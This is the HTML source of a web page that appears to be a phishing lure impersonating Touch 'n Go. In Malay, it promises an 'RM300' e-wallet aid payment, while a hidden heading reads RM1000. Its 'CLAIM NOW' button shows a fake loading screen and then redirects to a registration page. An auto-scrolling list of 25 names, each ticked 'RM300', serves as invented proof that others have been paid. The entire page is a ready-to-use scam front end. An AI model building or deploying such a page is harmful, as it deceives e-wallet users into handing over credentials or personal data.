<!DOCTYPE html>
<html lang="id">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Claim Now Bantuan e-Wallet Touch n Go RM 300</title>
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap"
    />
    <style>
      #loading {
        position: fixed;
        top: 0;
        left: 0;
        width: 100%;
        height: 100%;
        background-color: rgba(0, 0, 0, 0.8);
        color: white;
        display: none; /* Hide by default */
        justify-content: center;
        align-items: center;
        font-size: 24px;
        z-index: 9999; /* Ensure it covers other content */
      }

      #loading img {
        width: 60px; /* Adjust size as needed */
        height: auto;
      }

      * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
        font-family: Arial, Helvetica, sans-serif;
      }

      body,
      html {
        height: 100%;
        width: 100%;
      }

      .hero {
        height: 100vh;
        width: 100%;
        background-color: #fff;
        position: relative;
      }

      /* navbar */
      .navbar {
        display: flex;
        justify-content: space-between;
        align-items: center;
        background-color: #fff; /* Warna latar belakang navbar */
        padding: 10px 20px;
        position: fixed;
        top: 0;
        left: 0;
        right: 0;
        z-index: 9999;
      }

      .navbar .navbar-logo {
        font-size: 2vw; /* Ukuran font logo dinamis */
        color: #010101;
        font-weight: 400;
        display: flex;
        align-items: center;
      }

      .navbar .navbar-nav {
        display: flex;
        align-items: center;
        justify-content: flex-end; /* Posisi tautan tetap rapih di ujung kanan */
        flex-wrap: nowrap; /* Mencegah elemen terbungkus menjadi kolom */
      }

      .navbar .navbar-nav a {
        color: #010101; /* Warna teks bahasa */
        font-weight: bold;
        font-size: 1.5vw; /* Ukuran font dinamis */
        margin: 0 10px; /* Menambahkan jarak antar link bahasa */
        padding: 5px; /* Ruang klik */
        text-decoration: none; /* Menghilangkan garis bawah pada link */
        white-space: nowrap; /* Mencegah teks terpotong ke baris baru */
      }

      .navbar .navbar-nav a span {
        color: blue;
      }

      .navbar .navbar-nav a:hover {
        color: #007bff; /* Warna hover */
        transition: color 0.3s ease; /* Efek transisi saat hover */
      }

      .navbar .navbar-img {
        width: 40px; /* Ukuran logo */
        height: auto;
        margin-left: 10px; /* Jarak antara logo dan teks */
        object-fit: contain; /* Menjaga proporsi gambar */
      }

      /* Media Query untuk layar kecil */
      @media (max-width: 768px) {
        .navbar {
          padding: 10px 10px; /* Mengurangi padding pada layar kecil */
        }

        .navbar .navbar-logo {
          font-size: 4vw; /* Ukuran font logo lebih besar pada layar kecil */
        }

        .navbar .navbar-nav {
          flex-direction: row; /* Pastikan tautan tetap satu baris */
        }

        .navbar .navbar-nav a {
          font-size: 3vw; /* Ukuran font lebih besar pada layar kecil */
          margin: 0 0; /* Mengurangi margin pada layar kecil */
          padding: 5px; /* Ruang klik pada layar kecil */
          font-size: 1.5rem;
        }
      }

      img {
        width: 350px; /* Atur lebar gambar sesuai keinginan */
        height: auto; /* Agar proporsi gambar tetap */
        display: block; /* Untuk membuatnya blok, bisa juga inline-block */
        margin: 0 auto; /* Posisikan di tengah jika dalam elemen blok */
      }

      img[src="img1.jpeg"] {
        margin-top: 50px;
      }

      .info {
        font-size: 20px;
        color: black;
        text-align: center;
        margin: 20px 0 30px;
      }

      .info span {
        color: #f8d704;
        font-weight: bold;
      }

      p {
        font-size: 20px;
        color: #f8d704;
        text-align: center;
        margin: 20px 0;
        font-weight: bold;
      }

      .container {
        display: flex;
        justify-content: center;
        margin-top: 10px;
      }

      .btn-daftar {
        background-color: #f8d704;
        color: white;
        font-size: 18px;
        padding: 12px 20px;
        border: none;
        border-radius: 15px;
        cursor: pointer;
        transition: background-color 0.3s ease;
      }

      .btn-daftar:hover {
        background-color: #0056b3;
      }

      ._record-box {
        width: 90%;
        margin: 20px auto;
        padding: 10px;
        background-color: #f1f1f1;
        border-radius: 10px;
        box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      }

      /* CSS untuk list-box */
      .list-box {
        overflow: hidden;
        max-height: 300px;
      }

      /* CSS untuk list */
      .list {
        display: flex;
        flex-direction: column;
      }

      /* CSS untuk item */
      .item {
        display: flex;
        align-items: center;
        padding: 1px;
        background-color: white;
        border-radius: 8px;
        margin-bottom: 10px;
      }

      /* CSS untuk logo/avatar */
      .record_logo img {
        width: 50px;
        height: 50px;
        border-radius: 50%;
        object-fit: cover;
        margin-right: 15px;
        margin-left: 15px;
      }

      /* CSS untuk nama */
      .center .h1 {
        font-size: 16px;
        font-weight: bold;
      }

      /* CSS untuk status */
      .center .h2 {
        font-size: 14px;
        color: green;
      }

      h4 {
        color: #fff;
      }

      /* Footer */
      footer {
        display: none;
        background-color: rgba(0, 0, 0, 0.8);
        padding: 20px;
        text-align: center;
        position: absolute;
        width: 100%;
        bottom: 0;
      }

      footer ul {
        display: flex;
        justify-content: center;
        gap: 20px;
      }

      footer ul li {
        list-style-type: none;
      }

      footer ul li a {
        color: white;
        text-decoration: none;
        font-weight: bold;
        font-size: 10px;
      }

      footer ul li a:hover {
        color: #ea1538;
        transition: 0.3s;
      }

      /* Responsiveness */
      @media (min-width: 769px) {
        nav ul {
          justify-content: flex-end;
        }
      }

      @media (max-width: 768px) {
        nav ul {
          display: none;
        }

        footer {
          display: block;
        }

        .logo {
          font-size: 15px;
        }

        .info {
          font-size: 28px;
        }

        p {
          font-size: 18px;
        }

        .btn-daftar {
          padding: 10px 18px;
          font-size: 16px;
        }

        .navbar-logo {
          width: 40px;
        }
      }

      @media (max-width: 480px) {
        .logo {
          font-size: 20px;
        }

        .info {
          font-size: 15px;
          padding-left: 10px;
          padding-right: 10px;
        }

        p {
          font-size: 16px;
        }

        .btn-daftar {
          padding: 8px 16px;
          font-size: 14px;
        }

        .navbar-logo {
          width: 30px;
        }
      }
    </style>
  </head>
  <body>
    <!-- Loading Screen -->
    <div id="loading">
      <img src="loading-loading-forever.gif" alt="Loading..." />
      <!-- Replace with your GIF -->
    </div>

    <nav class="navbar">
      <div class="navbar-nav">
        <a href="#">Bantuan e Wallet Touch n Go</a>
      </div>
    </nav>

    <h4>RM1000</h4>

    <div class="hero">
      <img src="img-22.jpeg" alt="tng-img" />

      <h3 class="info">
        CLAIM SEKARANG NI TUK DAPATKAN <span>RM300</span> <br />KAT E-WALLET
        ANDA
      </h3>
      <p>Bantuan e-Wallet RM300</p>
      <div class="container">
        <button class="btn-daftar" onclick="showLoading('pendaftaran.html')">
          CLAIM NOW
        </button>
      </div>

      <div class="_record-box">
        <div id="list" class="list-box">
          <div class="list">
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Ahmad Zulkifli</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Zarina Muhammad</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Iskandar Zainal</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Rohani Latiff</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Shahrul Nizam</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Norazman Hashim</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Farah Abdul</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Zulkifli Ibrahim</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Siti Sarah</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Muhammad Fahmi</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Nurul Afiqah</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Azhar Abdullah</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Hasnah Abdul</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Rahim Salleh</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Nadia Hafiz</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Fariz Musa</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Rina Zainal</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Amir Rahman</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Norshila Anuar</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Zainuddin Ali</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1">
                  <span class="name">Fauzi Abdul Rahman</span>
                </div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Lina Mohd Noor</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Eddy Hisham</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Salina Harun</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
            <div class="item">
              <div class="record_logo">
                <img src="avatar.png" alt="" />
              </div>
              <div class="center">
                <div class="h1"><span class="name">Kamal Zain</span></div>
                <div class="h2">RM300 ✅</div>
              </div>
            </div>
          </div>
        </div>
      </div>

      <script>
        function showLoading(url) {
          // Show the loading screen
          document.getElementById("loading").style.display = "flex";

          // Redirect to the specified URL after 2 seconds
          setTimeout(function () {
            window.location.href = url;
          }, 2000);
        }
      </script>
    </div>

    <script>
      function startAutoScroll() {
        var list = document.querySelector(".list");
        var scrollTimer;

        function scrollList() {
          var firstItem = list.querySelector(".item:first-child");
          var itemHeight = firstItem.offsetHeight;

          list.style.transition = "margin-top 1s ease";
          list.style.marginTop = `-${itemHeight}px`;

          setTimeout(function () {
            list.style.transition = "none";
            list.style.marginTop = "0px";
            list.appendChild(firstItem); // Pindahkan item pertama ke akhir
          }, 1000); // Setelah animasi selesai (1 detik)

          scrollTimer = setTimeout(scrollList, 2000); // Ulangi scroll setiap 2 detik
        }

        scrollList(); // Mulai scrolling
      }

      document.addEventListener("DOMContentLoaded", function () {
        startAutoScroll(); // Jalankan scrolling otomatis saat halaman dimuat
      });
    </script>
  </body>
</html>
